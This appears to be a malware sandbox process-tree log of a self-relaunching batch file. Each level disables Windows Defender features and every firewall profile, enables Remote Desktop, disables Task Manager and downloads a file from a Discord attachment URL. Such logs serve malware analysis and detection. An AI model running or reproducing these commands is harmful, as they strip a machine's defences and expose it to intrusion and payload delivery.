C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:2772
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"10⤵
- Suspicious use of AdjustPrivilegeToken
PID:2928
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"10⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
PID:2956
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"10⤵
- Suspicious use of AdjustPrivilegeToken
PID:1440 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"11⤵PID:4720
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"12⤵PID:5048
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f12⤵PID:4844
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"12⤵PID:1548
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f12⤵PID:1672
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"12⤵
- Suspicious use of AdjustPrivilegeToken
PID:2316
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"12⤵
- Suspicious use of AdjustPrivilegeToken
PID:4952
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"12⤵
- Suspicious use of AdjustPrivilegeToken
PID:4440
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"12⤵
- Suspicious use of AdjustPrivilegeToken
PID:1216
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"12⤵
- Suspicious use of AdjustPrivilegeToken
PID:740
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable12⤵PID:2352
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE12⤵PID:5048
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off12⤵PID:4116
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off12⤵PID:3116
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off12⤵PID:4092
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off12⤵PID:3800
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off12⤵PID:2764
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"12⤵
- Suspicious use of AdjustPrivilegeToken
PID:2668
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"12⤵
- Suspicious use of AdjustPrivilegeToken
PID:1540
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"12⤵
- Suspicious use of AdjustPrivilegeToken
PID:1216
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"12⤵
- Suspicious use of AdjustPrivilegeToken
PID:880
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"12⤵
- Suspicious use of AdjustPrivilegeToken
PID:2520
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"12⤵
- Suspicious use of AdjustPrivilegeToken
PID:1968
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"12⤵
- Blocklisted process makes network request
PID:388
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"12⤵PID:2884
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"13⤵PID:732
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"14⤵PID:1548
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f14⤵PID:4844
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"14⤵PID:856
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f14⤵PID:2352
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"14⤵PID:2528
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"14⤵PID:4012
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"14⤵PID:3980
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"14⤵PID:2788
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"14⤵PID:3924
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable14⤵PID:4284
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE14⤵PID:2352
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off14⤵PID:4092
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off14⤵PID:4264
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off14⤵
- Modifies Windows Firewall
PID:4532
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off14⤵PID:1492
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off14⤵PID:4048
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"14⤵PID:4932
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"14⤵PID:4704
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"14⤵PID:2220
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"14⤵PID:1124
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"14⤵PID:4092
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"14⤵
- Command and Scripting Interpreter: PowerShell
PID:1704
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"14⤵
- Blocklisted process makes network request
PID:2840
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"14⤵
- Modifies registry class
PID:2600
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"15⤵PID:3480
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"16⤵PID:2864
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f16⤵PID:2220
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"16⤵PID:628
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f16⤵PID:652
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"16⤵PID:3300
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"16⤵PID:4864
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"16⤵PID:1736
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"16⤵PID:2840
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"16⤵PID:1036
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable16⤵PID:1212
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE16⤵PID:1676
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off16⤵
- Modifies Windows Firewall
PID:4812
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off16⤵PID:2960
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off16⤵PID:2576
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off16⤵PID:2928
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off16⤵PID:3108
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"16⤵PID:5032
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"16⤵PID:3192
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"16⤵PID:2884
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"16⤵PID:2220
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"16⤵PID:2948
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"16⤵PID:1188
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"16⤵
- Blocklisted process makes network request
PID:2668
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"16⤵
- Modifies registry class
PID:4208
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"17⤵PID:2688
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"18⤵PID:3684
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f18⤵PID:1116
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"18⤵PID:4916
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f18⤵PID:1104
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"18⤵PID:3160
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"18⤵PID:1092
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"18⤵PID:4800
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"18⤵PID:4848
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"18⤵PID:2060
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable18⤵PID:3328
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE18⤵PID:976
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off18⤵PID:1948
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off18⤵PID:4812
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off18⤵PID:4532
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off18⤵PID:1912
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off18⤵PID:4436
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"18⤵PID:2928
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"18⤵PID:1736
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"18⤵PID:3484
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"18⤵PID:640
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"18⤵PID:2220
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"18⤵PID:4048
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"18⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
PID:4588
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"18⤵
- Modifies registry class
PID:2576
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"19⤵PID:3264
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"20⤵PID:4516
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f20⤵PID:5080
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"20⤵PID:3932
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f20⤵PID:1676
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"20⤵PID:676
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"20⤵PID:1492
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"20⤵PID:3108
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"20⤵PID:3876
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"20⤵PID:3408
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable20⤵
- Modifies Windows Firewall
PID:2688
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE20⤵PID:4516
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off20⤵PID:4904
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off20⤵PID:4312
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off20⤵PID:4116
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off20⤵PID:3520
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off20⤵
- Modifies Windows Firewall
PID:3404
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"20⤵PID:4864
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"20⤵PID:3372
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"20⤵PID:3460
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"20⤵PID:5080
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"20⤵PID:2328
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"20⤵PID:2220
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"20⤵
- Blocklisted process makes network request
PID:3472
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"20⤵
- Modifies registry class
PID:1128
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"21⤵PID:2752
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"22⤵PID:3684
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f22⤵PID:3696
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"22⤵PID:2060
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f22⤵PID:2864
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"22⤵PID:2152
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"22⤵PID:3272
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"22⤵PID:1136
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"22⤵PID:2856
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"22⤵PID:3472
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable22⤵PID:1548
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE22⤵PID:3076
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off22⤵PID:248
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off22⤵PID:1840
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off22⤵PID:2748
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off22⤵PID:1084
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off22⤵PID:3040
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"22⤵PID:4932
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"22⤵
- Command and Scripting Interpreter: PowerShell
PID:1212
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"22⤵PID:3416
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"22⤵PID:2668
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"22⤵PID:2320
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"22⤵PID:3932
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"22⤵PID:4824
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"22⤵PID:3364
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"23⤵PID:2632
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"24⤵PID:1528
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f24⤵PID:3628
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"24⤵PID:3576
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f24⤵PID:2052
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"24⤵PID:4796
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"24⤵PID:2500
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"24⤵PID:1884
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"24⤵PID:3684
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"24⤵PID:3976
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable24⤵PID:4676
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE24⤵PID:4824
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off24⤵PID:1124
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off24⤵PID:1092
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off24⤵PID:2100
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off24⤵PID:3372
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off24⤵PID:3576
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"24⤵PID:2452
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"24⤵PID:4972
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"24⤵PID:4680
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"24⤵PID:1840
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"24⤵PID:248
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"24⤵PID:3960
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"24⤵
- Blocklisted process makes network request
PID:2044
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"24⤵
- Modifies registry class
PID:4048
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"25⤵PID:1912
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"26⤵PID:236
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f26⤵PID:1656
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"26⤵PID:2372
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f26⤵PID:2352
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"26⤵PID:2340
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"26⤵PID:4848
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"26⤵PID:4916
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"26⤵PID:2364
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"26⤵PID:2468
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable26⤵PID:1528
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE26⤵
- Modifies Windows Firewall
PID:1200
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off26⤵PID:4740
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off26⤵PID:1060
-
-
